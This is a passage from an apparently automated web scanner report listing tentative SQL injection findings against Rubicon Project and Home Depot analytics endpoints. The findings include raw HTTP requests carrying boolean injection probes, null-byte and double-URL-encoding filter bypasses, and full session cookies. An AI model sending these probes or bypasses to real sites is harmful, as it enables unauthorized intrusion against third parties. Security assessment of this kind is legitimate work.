Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d1--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d2--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.36. http://tap.rubiconproject.com/oz/sensor [xt parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The xt parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the xt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d1--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d2--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.37. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11473368444548 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s11473368444548

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html

1.38. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11999640008134 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s11999640008134

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s11999640008134 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html

1.39. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12511742944840 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s12511742944840

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
xserver: www371
Content-Length: 0
Content-Type: text/html

1.40. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12586278942128 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s12586278942128

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

Request 1

GET /b%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
Content-Length: 438
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/homedepot/1/H.22.1/s12586278942128 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html

1.41. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12715079787576 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s12715079787576

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
xserver: www290
Content-Length: 0
Content-Type: text/html

1.42. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s13481482698842 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s13481482698842

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
